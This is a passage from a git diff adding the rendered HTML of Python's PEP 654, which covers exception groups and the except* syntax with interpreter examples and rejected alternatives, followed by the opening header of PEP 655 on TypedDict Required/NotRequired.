+ | ExceptionGroup: two (2 sub-exceptions)
+ +-+---------------- 1 ----------------
+   | Traceback (most recent call last):
+   |   File "<stdin>", line 3, in f
+   | ValueError: 2
+   +---------------- 2 ----------------
+   | Exception Group Traceback (most recent call last):
+   |   File "<stdin>", line 2, in <module>
+   | ExceptionGroup: one (1 sub-exception)
+   +-+---------------- 1 ----------------
+     | Traceback (most recent call last):
+     |   File "<stdin>", line 3, in f
+     | ValueError: 1
+     +------------------------------------
+>>>
+
+
+
+
+

Handling Exception Groups

+

We expect that when programs catch and handle exception groups, they will +typically either query to check if it has leaf exceptions for which some +condition holds (using subgroup or split) or format the exception +(using the traceback module’s methods).

+

It is less likely to be useful to iterate over the individual leaf exceptions. +To see why, suppose that an application caught an exception group raised by +an asyncio.gather() call. At this stage, the context for each specific +exception is lost. Any recovery for this exception should have been performed +before it was grouped with other exceptions [10]. +Furthermore, the application is likely to react in the same way to any number +of instances of a certain exception type, so it is more likely that we will +want to know whether eg.subgroup(T) is None or not, than we are to be +interested in the number of Ts in eg.

+

However, there are situations where it is necessary to inspect the +individual leaf exceptions. For example, suppose that we have an +exception group eg and that we want to log the OSErrors that have a +specific error code and reraise everything else. We can do this by passing +a function with side effects to subgroup, as follows:

+
def log_and_ignore_ENOENT(err):
+    if isinstance(err, OSError) and err.errno == ENOENT:
+        log(err)
+        return False
+    else:
+        return True
+
+try:
+    . . .
+except ExceptionGroup as eg:
+    eg = eg.subgroup(log_and_ignore_ENOENT)
+    if eg is not None:
+        raise eg
+
+
+

In the previous example, when log_and_ignore_ENOENT is invoked on a leaf +exception, only part of this exception’s traceback is accessible – the part +referenced from its __traceback__ field. If we need the full traceback, +we need to look at the concatenation of the tracebacks of the exceptions on +the path from the root to this leaf. We can get that with direct iteration, +recursively, as follows:

+
def leaf_generator(exc, tbs=None):
+    if tbs is None:
+        tbs = []
+
+    tbs.append(exc.__traceback__)
+    if isinstance(exc, BaseExceptionGroup):
+        for e in exc.exceptions:
+            yield from leaf_generator(e, tbs)
+    else:
+        # exc is a leaf exception and its traceback
+        # is the concatenation of the traceback
+        # segments in tbs.
+
+        # Note: the list returned (tbs) is reused in each iteration
+        # through the generator. Make a copy if your use case holds
+        # on to it beyond the current iteration or mutates its contents.
+
+        yield exc, tbs
+    tbs.pop()
+
+
+

We can then process the full tracebacks of the leaf exceptions:

+
>>> import traceback
+>>>
+>>> def g(v):
+...     try:
+...         raise ValueError(v)
+...     except Exception as e:
+...         return e
+...
+>>> def f():
+...     raise ExceptionGroup("eg", [g(1), g(2)])
+...
+>>> try:
+...     f()
+... except BaseException as e:
+...     eg = e
+...
+>>> for (i, (exc, tbs)) in enumerate(leaf_generator(eg)):
+...     print(f"\n=== Exception #{i+1}:")
+...     traceback.print_exception(exc)
+...     print(f"The complete traceback for Exception #{i+1}:")
+...     for tb in tbs:
+...         traceback.print_tb(tb)
+...
+
+=== Exception #1:
+Traceback (most recent call last):
+  File "<stdin>", line 3, in g
+ValueError: 1
+The complete traceback for Exception #1
+  File "<stdin>", line 2, in <module>
+  File "<stdin>", line 2, in f
+  File "<stdin>", line 3, in g
+
+=== Exception #2:
+Traceback (most recent call last):
+  File "<stdin>", line 3, in g
+ValueError: 2
+The complete traceback for Exception #2:
+  File "<stdin>", line 2, in <module>
+  File "<stdin>", line 2, in f
+  File "<stdin>", line 3, in g
+>>>
+
+
+
+
+
+

except*

+

We are proposing to introduce a new variant of the try..except syntax to +simplify working with exception groups. The * symbol indicates that multiple +exceptions can be handled by each except* clause:

+
try:
+    ...
+except* SpamError:
+    ...
+except* FooError as e:
+    ...
+except* (BarError, BazError) as e:
+    ...
+
+
+

In a traditional try-except statement there is only one exception to handle, +so the body of at most one except clause executes; the first one that matches +the exception. With the new syntax, an except* clause can match a subgroup +of the exception group that was raised, while the remaining part is matched +by following except* clauses. In other words, a single exception group can +cause several except* clauses to execute, but each such clause executes at +most once (for all matching exceptions from the group) and each exception is +either handled by exactly one clause (the first one that matches its type) +or is reraised at the end. The manner in which each exception is handled by +a try-except* block is independent of any other exceptions in the group.

+

For example, suppose that the body of the try block above raises +eg = ExceptionGroup('msg', [FooError(1), FooError(2), BazError()]). +The except* clauses are evaluated in order by calling split on the +unhandled exception group, which is initially equal to eg and then shrinks +as exceptions are matched and extracted from it. In the first except* clause, +unhandled.split(SpamError) returns (None, unhandled) so the body of this +block is not executed and unhandled is unchanged. For the second block, +unhandled.split(FooError) returns a non-trivial split (match, rest) with +match = ExceptionGroup('msg', [FooError(1), FooError(2)]) +and rest = ExceptionGroup('msg', [BazError()]). The body of this except* +block is executed, with the value of e and sys.exc_info() set to match. +Then, unhandled is set to rest. +Finally, the third block matches the remaining exception so it is executed +with e and sys.exc_info() set to ExceptionGroup('msg', [BazError()]).

+

Exceptions are matched using a subclass check. For example:

+
try:
+    low_level_os_operation()
+except* OSError as eg:
+    for e in eg.exceptions:
+        print(type(e).__name__)
+
+
+

could output:

+
BlockingIOError
+ConnectionRefusedError
+OSError
+InterruptedError
+BlockingIOError
+
+
+

The order of except* clauses is significant just like with the regular +try..except:

+
>>> try:
+...     raise ExceptionGroup("problem", [BlockingIOError()])
+... except* OSError as e:   # Would catch the error
+...     print(repr(e))
+... except* BlockingIOError: # Would never run
+...     print('never')
+...
+ExceptionGroup('problem', [BlockingIOError()])
+
+
+
+

Recursive Matching

+

The matching of except* clauses against an exception group is performed +recursively, using the split() method:

+
>>> try:
+...     raise ExceptionGroup(
+...         "eg",
+...         [
+...             ValueError('a'),
+...             TypeError('b'),
+...             ExceptionGroup(
+...                 "nested",
+...                 [TypeError('c'), KeyError('d')])
+...         ]
+...     )
+... except* TypeError as e1:
+...     print(f'e1 = {e1!r}')
+... except* Exception as e2:
+...     print(f'e2 = {e2!r}')
+...
+e1 = ExceptionGroup('eg', [TypeError('b'), ExceptionGroup('nested', [TypeError('c')])])
+e2 = ExceptionGroup('eg', [ValueError('a'), ExceptionGroup('nested', [KeyError('d')])])
+>>>
+
+
+
+
+

Unmatched Exceptions

+

If not all exceptions in an exception group were matched by the except* +clauses, the remaining part of the group is propagated on:

+
>>> try:
+...     try:
+...         raise ExceptionGroup(
+...             "msg", [
+...                  ValueError('a'), TypeError('b'),
+...                  TypeError('c'), KeyError('e')
+...             ]
+...         )
+...     except* ValueError as e:
+...         print(f'got some ValueErrors: {e!r}')
+...     except* TypeError as e:
+...         print(f'got some TypeErrors: {e!r}')
+... except ExceptionGroup as e:
+...     print(f'propagated: {e!r}')
+...
+got some ValueErrors: ExceptionGroup('msg', [ValueError('a')])
+got some TypeErrors: ExceptionGroup('msg', [TypeError('b'), TypeError('c')])
+propagated: ExceptionGroup('msg', [KeyError('e')])
+>>>
+
+
+
+
+

Naked Exceptions

+

If the exception raised inside the try body is not of type ExceptionGroup +or BaseExceptionGroup, we call it a naked exception. If its type matches +one of the except* clauses, it is caught and wrapped by an ExceptionGroup +(or BaseExceptionGroup if it is not an Exception subclass) with an empty +message string. This is to make the type of e consistent and statically known:

+
>>> try:
+...     raise BlockingIOError
+... except* OSError as e:
+...     print(repr(e))
+...
+ExceptionGroup('', [BlockingIOError()])
+
+
+

However, if a naked exception is not caught, it propagates in its original +naked form:

+
>>> try:
+...     try:
+...         raise ValueError(12)
+...     except* TypeError as e:
+...         print('never')
+... except ValueError as e:
+...     print(f'caught ValueError: {e!r}')
+...
+caught ValueError: ValueError(12)
+>>>
+
+
+
+
+

Raising exceptions in an except* block

+

In a traditional except block, there are two ways to raise exceptions: +raise e to explicitly raise an exception object e, or naked raise to +reraise the ‘current exception’. When e is the current exception, the two +forms are not equivalent because a reraise does not add the current frame to +the stack:

+
def foo():                           | def foo():
+    try:                             |     try:
+        1 / 0                        |         1 / 0
+    except ZeroDivisionError as e:   |     except ZeroDivisionError:
+        raise e                      |         raise
+                                     |
+foo()                                | foo()
+                                     |
+Traceback (most recent call last):   | Traceback (most recent call last):
+  File "/Users/guido/a.py", line 7   |   File "/Users/guido/b.py", line 7
+   foo()                             |     foo()
+  File "/Users/guido/a.py", line 5   |   File "/Users/guido/b.py", line 3
+   raise e                           |     1/0
+  File "/Users/guido/a.py", line 3   | ZeroDivisionError: division by zero
+   1/0                               |
+ZeroDivisionError: division by zero  |
+
+
+

This holds for exception groups as well, but the situation is now more complex +because there can be exceptions raised and reraised from multiple except* +clauses, as well as unhandled exceptions that need to propagate. +The interpreter needs to combine all those exceptions into a result, and +raise that.

+

The reraised exceptions and the unhandled exceptions are subgroups of the +original group, and share its metadata (cause, context, traceback). +On the other hand, each of the explicitly raised exceptions has its own +metadata - the traceback contains the line from which it was raised, its +cause is whatever it may have been explicitly chained to, and its context is the +value of sys.exc_info() in the except* clause of the raise.

+

In the aggregated exception group, the reraised and unhandled exceptions have +the same relative structure as in the original exception, as if they were split +off together in one subgroup call. For example, in the snippet below the +inner try-except* block raises an ExceptionGroup that contains all +ValueErrors and TypeErrors merged back into the same shape they had in +the original ExceptionGroup:

+
>>> try:
+...     try:
+...         raise ExceptionGroup(
+...             "eg",
+...             [
+...                 ValueError(1),
+...                 TypeError(2),
+...                 OSError(3),
+...                 ExceptionGroup(
+...                     "nested",
+...                     [OSError(4), TypeError(5), ValueError(6)])
+...             ]
+...         )
+...     except* ValueError as e:
+...         print(f'*ValueError: {e!r}')
+...         raise
+...     except* OSError as e:
+...         print(f'*OSError: {e!r}')
+... except ExceptionGroup as e:
+...     print(repr(e))
+...
+*ValueError: ExceptionGroup('eg', [ValueError(1), ExceptionGroup('nested', [ValueError(6)])])
+*OSError: ExceptionGroup('eg', [OSError(3), ExceptionGroup('nested', [OSError(4)])])
+ExceptionGroup('eg', [ValueError(1), TypeError(2), ExceptionGroup('nested', [TypeError(5), ValueError(6)])])
+>>>
+
+
+

When exceptions are raised explicitly, they are independent of the original +exception group, and cannot be merged with it (they have their own cause, +context and traceback). Instead, they are combined into a new ExceptionGroup +(or BaseExceptionGroup), which also contains the reraised/unhandled +subgroup described above.

+

In the following example, the ValueErrors were raised so they are in their +own ExceptionGroup, while the OSErrors were reraised so they were +merged with the unhandled TypeErrors.

+
>>> try:
+...     raise ExceptionGroup(
+...         "eg",
+...         [
+...             ValueError(1),
+...             TypeError(2),
+...             OSError(3),
+...             ExceptionGroup(
+...                 "nested",
+...                 [OSError(4), TypeError(5), ValueError(6)])
+...         ]
+...     )
+... except* ValueError as e:
+...     print(f'*ValueError: {e!r}')
+...     raise e
+... except* OSError as e:
+...     print(f'*OSError: {e!r}')
+...     raise
+...
+*ValueError: ExceptionGroup('eg', [ValueError(1), ExceptionGroup('nested', [ValueError(6)])])
+*OSError: ExceptionGroup('eg', [OSError(3), ExceptionGroup('nested', [OSError(4)])])
+  | ExceptionGroup:  (2 sub-exceptions)
+  +-+---------------- 1 ----------------
+    | Exception Group Traceback (most recent call last):
+    |   File "<stdin>", line 15, in <module>
+    |   File "<stdin>", line 2, in <module>
+    | ExceptionGroup: eg (2 sub-exceptions)
+    +-+---------------- 1 ----------------
+      | ValueError: 1
+      +---------------- 2 ----------------
+      | ExceptionGroup: nested (1 sub-exception)
+      +-+---------------- 1 ----------------
+        | ValueError: 6
+        +------------------------------------
+    +---------------- 2 ----------------
+    | Exception Group Traceback (most recent call last):
+    |   File "<stdin>", line 2, in <module>
+    | ExceptionGroup: eg (3 sub-exceptions)
+    +-+---------------- 1 ----------------
+      | TypeError: 2
+      +---------------- 2 ----------------
+      | OSError: 3
+      +---------------- 3 ----------------
+      | ExceptionGroup: nested (2 sub-exceptions)
+      +-+---------------- 1 ----------------
+        | OSError: 4
+        +---------------- 2 ----------------
+        | TypeError: 5
+        +------------------------------------
+>>>
+
+
+
+
+

Chaining

+

Explicitly raised exception groups are chained as with any exceptions. The +following example shows how part of ExceptionGroup “one” became the +context for ExceptionGroup “two”, while the other part was combined with +it into the new ExceptionGroup.

+
>>> try:
+...     raise ExceptionGroup("one", [ValueError('a'), TypeError('b')])
+... except* ValueError:
+...     raise ExceptionGroup("two", [KeyError('x'), KeyError('y')])
+...
+  | ExceptionGroup:  (2 sub-exceptions)
+  +-+---------------- 1 ----------------
+    | Exception Group Traceback (most recent call last):
+    |   File "<stdin>", line 2, in <module>
+    | ExceptionGroup: one (1 sub-exception)
+    +-+---------------- 1 ----------------
+      | ValueError: a
+      +------------------------------------
+    |
+    | During handling of the above exception, another exception occurred:
+    |
+    | Exception Group Traceback (most recent call last):
+    |   File "<stdin>", line 4, in <module>
+    | ExceptionGroup: two (2 sub-exceptions)
+    +-+---------------- 1 ----------------
+      | KeyError: 'x'
+      +---------------- 2 ----------------
+      | KeyError: 'y'
+      +------------------------------------
+    +---------------- 2 ----------------
+    | Exception Group Traceback (most recent call last):
+    |   File "<stdin>", line 2, in <module>
+    | ExceptionGroup: one (1 sub-exception)
+    +-+---------------- 1 ----------------
+      | TypeError: b
+      +------------------------------------
+>>>
+
+
+
+
+

Raising New Exceptions

+

In the previous examples the explicit raises were of the exceptions that +were caught, so for completion we show a new exception being raised, with +chaining:

+
>>> try:
+...     raise TypeError('bad type')
+... except* TypeError as e:
+...     raise ValueError('bad value') from e
+...
+  | ExceptionGroup:  (1 sub-exception)
+  +-+---------------- 1 ----------------
+    | Traceback (most recent call last):
+    |   File "<stdin>", line 2, in <module>
+    | TypeError: bad type
+    +------------------------------------
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+  File "<stdin>", line 4, in <module>
+ValueError: bad value
+>>>
+
+
+

Note that exceptions raised in one except* clause are not eligible to match +other clauses from the same try statement:

+
>>> try:
+...     raise TypeError(1)
+... except* TypeError:
+...     raise ValueError(2) from None  # <- not caught in the next clause
+... except* ValueError:
+...     print('never')
+...
+Traceback (most recent call last):
+  File "<stdin>", line 4, in <module>
+ValueError: 2
+>>>
+
+
+

Raising a new instance of a naked exception does not cause this exception to +be wrapped by an exception group. Rather, the exception is raised as is, and +if it needs to be combined with other propagated exceptions, it becomes a +direct child of the new exception group created for that:

+
>>> try:
+...     raise ExceptionGroup("eg", [ValueError('a')])
+... except* ValueError:
+...     raise KeyError('x')
+...
+  | ExceptionGroup:  (1 sub-exception)
+  +-+---------------- 1 ----------------
+    | Exception Group Traceback (most recent call last):
+    |   File "<stdin>", line 2, in <module>
+    | ExceptionGroup: eg (1 sub-exception)
+    +-+---------------- 1 ----------------
+      | ValueError: a
+      +------------------------------------
+    |
+    | During handling of the above exception, another exception occurred:
+    |
+    | Traceback (most recent call last):
+    |   File "<stdin>", line 4, in <module>
+    | KeyError: 'x'
+    +------------------------------------
+>>>
+>>> try:
+...     raise ExceptionGroup("eg", [ValueError('a'), TypeError('b')])
+... except* ValueError:
+...     raise KeyError('x')
+...
+  | ExceptionGroup:  (2 sub-exceptions)
+  +-+---------------- 1 ----------------
+    | Exception Group Traceback (most recent call last):
+    |   File "<stdin>", line 2, in <module>
+    | ExceptionGroup: eg (1 sub-exception)
+    +-+---------------- 1 ----------------
+      | ValueError: a
+      +------------------------------------
+    |
+    | During handling of the above exception, another exception occurred:
+    |
+    | Traceback (most recent call last):
+    |   File "<stdin>", line 4, in <module>
+    | KeyError: 'x'
+    +---------------- 2 ----------------
+    | Exception Group Traceback (most recent call last):
+    |   File "<stdin>", line 2, in <module>
+    | ExceptionGroup: eg (1 sub-exception)
+    +-+---------------- 1 ----------------
+      | TypeError: b
+      +------------------------------------
+>>>
+
+
+

Finally, as an example of how the proposed semantics can help us work +effectively with exception groups, the following code ignores all EPIPE +OS errors, while letting all other exceptions propagate.

+
try:
+    low_level_os_operation()
+except* OSError as errors:
+    exc = errors.subgroup(lambda e: e.errno != errno.EPIPE)
+    if exc is not None:
+        raise exc from None
+
+
+
+
+

Caught Exception Objects

+

It is important to point out that the exception group bound to e in an +except* clause is an ephemeral object. Raising it via raise or +raise e will not cause changes to the overall shape of the original +exception group. Any modifications to e will likely be lost:

+
>>> eg = ExceptionGroup("eg", [TypeError(12)])
+>>> eg.foo = 'foo'
+>>> try:
+...     raise eg
+... except* TypeError as e:
+...     e.foo = 'bar'
+... #   ^----------- ``e`` is an ephemeral object that might get
+>>> #                      destroyed after the ``except*`` clause.
+>>> eg.foo
+'foo'
+
+
+
+
+

Forbidden Combinations

+

It is not possible to use both traditional except blocks and the new +except* clauses in the same try statement. The following is a +SyntaxError:

+
try:
+    ...
+except ValueError:
+    pass
+except* CancelledError:  # <- SyntaxError:
+    pass                 #    combining ``except`` and ``except*``
+                         #    is prohibited
+
+
+

It is possible to catch the ExceptionGroup and BaseExceptionGroup +types with except, but not with except* because the latter is +ambiguous:

+
try:
+    ...
+except ExceptionGroup:  # <- This works
+    pass
+
+try:
+    ...
+except* ExceptionGroup:  # <- Runtime error
+    pass
+
+try:
+    ...
+except* (TypeError, ExceptionGroup):  # <- Runtime error
+    pass
+
+
+

An empty “match anything” except* block is not supported as its meaning may +be confusing:

+
try:
+    ...
+except*:   # <- SyntaxError
+    pass
+
+
+

continue, break, and return are disallowed in except* clauses, +causing a SyntaxError. This is because the exceptions in an +ExceptionGroup are assumed to be independent, and the presence or absence +of one of them should not impact handling of the others, as could happen if we +allow an except* clause to change the way control flows through other +clauses.

+
+
+
+
+

Backwards Compatibility

+

Backwards compatibility was a requirement of our design, and the changes we +propose in this PEP will not break any existing code:

+
    +
  • The addition of the new builtin exception types ExceptionGroup and +BaseExceptionGroup does not impact existing programs. The way that +existing exceptions are handled and displayed does not change in any way.
  • +
  • The behaviour of except is unchanged so existing code will continue to work. +Programs will only be impacted by the changes proposed in this PEP once they +begin to use exception groups and except*.
  • +
  • An important concern was that except Exception: will continue to catch +almost all exceptions, and by making ExceptionGroup extend Exception +we ensured that this will be the case. BaseExceptionGroups will not be +caught, which is appropriate because they include exceptions that would not +have been caught by except Exception.
  • +
+

Once programs begin to use these features, there will be migration issues to +consider:

+
    +
  • An except T: clause that wraps code which is now potentially raising +an exception group may need to become except* T:, and its body may +need to be updated. This means that raising an exception group is an +API-breaking change and will likely be done in new APIs rather than +added to existing ones.
  • +
  • Libraries that need to support older Python versions will not be able to use +except* or raise exception groups.
  • +
+
+
+

How to Teach This

+

Exception groups and except* will be documented as part of the language +standard. Libraries that raise exception groups such as asyncio will need +to specify this in their documentation and clarify which API calls need to be +wrapped with try-except* rather than try-except.

+
+
+

Reference Implementation

+

We developed these concepts (and the examples for this PEP) with +the help of the reference implementation [11].

+

It has the builtin ExceptionGroup along with the changes to the traceback +formatting code, in addition to the grammar, compiler and interpreter changes +required to support except*. BaseExceptionGroup will be added +soon.

+

Two opcodes were added: one implements the exception type match check via +ExceptionGroup.split(), and the other is used at the end of a try-except +construct to merge all unhandled, raised and reraised exceptions (if any). +The raised/reraised exceptions are collected in a list on the runtime stack. +For this purpose, the body of each except* clause is wrapped in a traditional +try-except which captures any exceptions raised. Both raised and reraised +exceptions are collected in the same list. When the time comes to merge them +into a result, the raised and reraised exceptions are distinguished by comparing +their metadata fields (context, cause, traceback) with those of the originally +raised exception. As mentioned above, the reraised exceptions have the same +metadata as the original, while the raised ones do not.

+
+
+

Rejected Ideas

+
+

Make Exception Groups Iterable

+

We considered making exception groups iterable, so that list(eg) would +produce a flattened list of the leaf exceptions contained in the group. +We decided that this would not be a sound API, because the metadata +(cause, context and traceback) of the individual exceptions in a group is +incomplete and this could create problems.

+

Furthermore, as we explained in the Handling Exception Groups section, we +find it unlikely that iteration over leaf exceptions will have many use cases. +We did, however, provide there the code for a traversal algorithm that +correctly constructs each leaf exceptions’ metadata. If it does turn out to +be useful in practice, we can in the future add that utility to the standard +library or even make exception groups iterable.

+
+
+

Make ExceptionGroup Extend BaseException

+

We considered making ExceptionGroup subclass only BaseException, +and not Exception. The rationale of this was that we expect exception +groups to be used in a deliberate manner where they are needed, and raised +only by APIs that are specifically designed and documented to do so. In +this context, an ExceptionGroup escaping from an API that is not +intended to raise one is a bug, and we wanted to give it “fatal error” +status so that except Exception will not inadvertently swallow it. +This would have been consistent with the way except T: does not catch +exception groups that contain T for all other types, and would help +contain ExceptionGroups to the parts of the program in which they are +supposed to appear. However, it was clear from the public discussion that +T=Exception is a special case, and there are developers who feel strongly +that except Exception: should catch “almost everything”, including +exception groups. This is why we decided to make ExceptionGroup a +subclass of Exception.

+
+
+

Make it Impossible to Wrap BaseExceptions in an Exception Group

+

A consequence of the decision to make ExceptionGroup extend +Exception is that ExceptionGroup should not wrap BaseExceptions +like KeyboardInterrupt, as they are not currently caught by +except Exception:. We considered the option of simply making it +impossible to wrap BaseExceptions, but eventually decided to make +it possible through the BaseExceptionGroup type, which extends +BaseException rather than Exception. Making this possible +adds flexibility to the language and leaves it for the programmer to +weigh the benefit of wrapping BaseExceptions rather than propagating +them in their naked form while discarding any other exceptions.

+
+
+

Traceback Representation

+

We considered options for adapting the traceback data structure to represent +trees, but it became apparent that a traceback tree is not meaningful once +separated from the exceptions it refers to. While a simple-path traceback can +be attached to any exception by a with_traceback() call, it is hard to +imagine a case where it makes sense to assign a traceback tree to an exception +group. Furthermore, a useful display of the traceback includes information +about the nested exceptions. For these reasons we decided that it is best to +leave the traceback mechanism as it is and modify the traceback display code.

+
+
+

Extend except to Handle Exception Groups

+

We considered extending the semantics of except to handle +exception groups, instead of introducing except*. There were two +backwards compatibility concerns with this. The first is the type of the +caught exception. Consider this example:

+
try:
+    . . .
+except OSError as err:
+    if err.errno != ENOENT:
+        raise
+
+
+

If the value assigned to err is an exception group containing all of +the OSErrors that were raised, then the attribute access err.errno +no longer works. So we would need to execute the body of the except +clause multiple times, once for each exception in the group. However, this +too is a potentially breaking change because at the moment we write except +clauses with the knowledge that they are only executed once. If there is +a non-idempotent operation there, such as releasing a resource, the +repetition could be harmful.

+

The idea of making except iterate over the leaf exceptions of an exception +group is at the heart of an alternative proposal to this PEP by Nathaniel J. Smith, +and the discussion about that proposal further elaborates on the pitfalls of +changing except semantics in a mature language like Python, as well as +deviating from the semantics that parallel constructs have in other languages.

+

Another option that came up in the public discussion was to add except*, +but also make except treat ExceptionGroups as a special case. +except would then do something along the lines of extracting one exception +of matching type from the group in order to handle it (while discarding all +the other exceptions in the group). The motivation behind +these suggestions was to make the adoption of exception groups safer, in that +except T catches Ts that are wrapped in exception groups. We decided +that such an approach adds considerable complexity to the semantics of the +language without making it more powerful. Even if it would make the adoption +of exception groups slightly easier (which is not at all obvious), these are +not the semantics we would like to have in the long term.

+
+
+

A New except Alternative

+

We considered introducing a new keyword (such as catch) which can be used +to handle both naked exceptions and exception groups. Its semantics would +be the same as those of except* when catching an exception group, but +it would not wrap a naked exception to create an exception group. This +would have been part of a long term plan to replace except by catch, +but we decided that deprecating except in favour of an enhanced keyword +would be too confusing for users at this time, so it is more appropriate +to introduce the except* syntax for exception groups while except +continues to be used for simple exceptions.

+
+
+

Applying an except* Clause on One Exception at a Time

+

We explained above that it is unsafe to execute an except clause in +existing code more than once, because the code may not be idempotent. +We considered doing this in the new except* clauses, +where the backwards compatibility considerations do not exist. +The idea is to always execute an except* clause on a single exception, +possibly executing the same clause multiple times when it matches multiple +exceptions. We decided instead to execute each except* clause at most +once, giving it an exception group that contains all matching exceptions. The +reason for this decision was the observation that when a program needs to know +the particular context of an exception it is handling, the exception is +handled before it is grouped and raised together with other exceptions.

+

For example, KeyError is an exception that typically relates to a certain +operation. Any recovery code would be local to the place where the error +occurred, and would use the traditional except:

+
try:
+    dct[key]
+except KeyError:
+    # handle the exception
+
+
+

It is unlikely that asyncio users would want to do something like this:

+
try:
+    async with asyncio.TaskGroup() as g:
+        g.create_task(task1); g.create_task(task2)
+except* KeyError:
+    # handling KeyError here is meaningless, there's
+    # no context to do anything with it but to log it.
+
+
+

When a program handles a collection of exceptions that were aggregated into +an exception group, it would not typically attempt to recover from any +particular failed operation, but will rather use the types of the errors to +determine how they should impact the program’s control flow or what logging +or cleanup is required. This decision is likely to be the same whether the group +contains a single or multiple instances of something like a KeyboardInterrupt +or asyncio.CancelledError. Therefore, it is more convenient to handle all +exceptions matching an except* at once. If it does turn out to be necessary, +the handler can inpect the exception group and process the individual +exceptions in it.

+
+
+

Not Matching Naked Exceptions in except*

+

We considered the option of making except* T match only exception groups +that contain Ts, but not naked Ts. To see why we thought this would +not be a desirable feature, return to the distinction in the previous paragraph +between operation errors and control flow exceptions. If we don’t know whether +we should expect naked exceptions or exception groups from the body of a +try block, then we’re not in the position of handling operation errors. +Rather, we are likely calling a fairly generic function and will be handling +errors to make control flow decisions. We are likely to do the same thing +whether we catch a naked exception of type T or an exception group +with one or more Ts. Therefore, the burden of having to explicitly handle +both is not likely to have semantic benefit.

+

If it does turn out to be necessary to make the distinction, it is always +possible to nest in the try-except* clause an additional try-except +clause which intercepts and handles a naked exception before the except* +clause has a chance to wrap it in an exception group. In this case the +overhead of specifying both is not additional burden - we really do need to +write a separate code block to handle each case:

+
try:
+    try:
+        ...
+    except SomeError:
+        # handle the naked exception
+except* SomeError:
+    # handle the exception group
+
+
+
+
+

Allow mixing except: and except*: in the same try

+

This option was rejected because it adds complexity without adding useful +semantics. Presumably the intention would be that an except T: block handles +only naked exceptions of type T, while except* T: handles T in +exception groups. We already discussed above why this is unlikely +to be useful in practice, and if it is needed then the nested try-except +block can be used instead to achieve the same result.

+
+
+

try* instead of except*

+

Since either all or none of the clauses of a try construct are except*, +we considered changing the syntax of the try instead of all the except* +clauses. We rejected this because it would be less obvious. The fact that we +are handling exception groups of T rather than only naked Ts should be +specified in the same place where we state T.

+
+
+

Alternative syntax options

+

Alternatives to the except* syntax were evaluated in a discussion on python-dev, and it was suggested to use +except group. Upon careful evaluation this was rejected because the following +would be ambiguous, as it is currently valid syntax where group is interpreted +as a callable. The same is true for any valid identifier.

+
try:
+   ...
+except group (T1, T2):
+   ...
+
+
+
+
+
+

Programming Without ‘except *’

+

Consider the following simple example of the except* syntax (pretending +Trio natively supported this proposal):

+
try:
+    async with trio.open_nursery() as nursery:
+        # Make two concurrent calls to child()
+        nursery.start_soon(child)
+        nursery.start_soon(child)
+except* ValueError:
+    pass
+
+
+

Here is how this code would look in Python 3.9:

+
def handle_ValueError(exc):
+    if isinstance(exc, ValueError):
+        return None
+    else:
+        return exc   # reraise exc
+
+with MultiError.catch(handle_ValueError):
+    async with trio.open_nursery() as nursery:
+        # Make two concurrent calls to child()
+        nursery.start_soon(child)
+        nursery.start_soon(child)
+
+
+

This example clearly demonstrates how unintuitive and cumbersome handling +of multiple errors is in current Python. The exception handling logic has +to be in a separate closure and is fairly low level, requiring the writer to +have non-trivial understanding of both Python exceptions mechanics and the +Trio APIs. Instead of using the try..except block we have to use a +with block. We need to explicitly reraise exceptions we are not handling. +Handling more exception types or implementing more complex +exception handling logic will only further complicate the code to the point +of it being unreadable.

+
+
+

See Also

+
    +
  • An analysis of how exception groups will likely be used in asyncio +programs: [10].
  • +
  • The issue where the except* concept was first formalized: [12].
  • +
  • MultiError2 design document: [3].
  • +
  • Reporting Multiple Errors in the Hypothesis library: [7].
  • +
+
+
+

Acknowledgements

+

We wish to thank Nathaniel J. Smith and the other Trio developers for their +work on structured concurrency. We borrowed the idea of constructing an +exception tree whose nodes are exceptions from MultiError, and the split() +API from the design document for MultiError V2. The discussions on python-dev +and elsewhere helped us improve upon the first draft of the PEP in multiple +ways, both the design and the exposition. For this we appreciate all those who +contributed ideas and asked good questions: Ammar Askar, Matthew Barnett, +Ran Benita, Emily Bowman, Brandt Bucher, Joao Bueno, Baptiste Carvello, +Rob Cliffe, Alyssa Coghlan, Steven D’Aprano, Caleb Donovick, Steve Dower, +Greg Ewing, Ethan Furman, Pablo Salgado, Jonathan Goble, Joe Gottman, Thomas Grainger, +Larry Hastings, Zac Hatfield-Dodds, Chris Jerdonek, Jim Jewett, Sven Kunze, +Łukasz Langa, Glenn Linderman, Paul Moore, Antoine Pitrou, Ivan Pozdeev, +Patrick Reader, Terry Reedy, Sascha Schlemmer, Barry Scott, Mark Shannon, +Damian Shaw, Cameron Simpson, Gregory Smith, Paul Sokolovsky, Calvin Spealman, +Steve Stagg, Victor Stinner, Marco Sulla, Petr Viktorin and Barry Warsaw.

+
+
+

Acceptance

+

PEP 654 was accepted by Thomas Wouters on Sep 24, 2021.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0654.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0655/index.html b/pep-0655/index.html new file mode 100644 index 00000000000..c55d2e6956a --- /dev/null +++ b/pep-0655/index.html @@ -0,0 +1,756 @@ + + + + + + + + PEP 655 – Marking individual TypedDict items as required or potentially-missing | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 655 – Marking individual TypedDict items as required or potentially-missing

+
+
Author:
+
David Foster <david at dafoster.net>
+
Sponsor:
+
Guido van Rossum <guido at python.org>
+
Discussions-To:
+
Typing-SIG thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
30-Jan-2021
+
Python-Version:
+
3.11
+
Post-History:
+
31-Jan-2021, 11-Feb-2021, 20-Feb-2021, 26-Feb-2021, 17-Jan-2022, 28-Jan-2022
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document: see Required and NotRequired, +typing.Required and +typing.NotRequired for up-to-date specs and documentation. Canonical typing specs are maintained at the typing specs site; runtime typing behaviour is described in the CPython documentation.

+

×

+

See the typing specification update process for how to propose changes to the typing spec.

+
+
+

Abstract

+

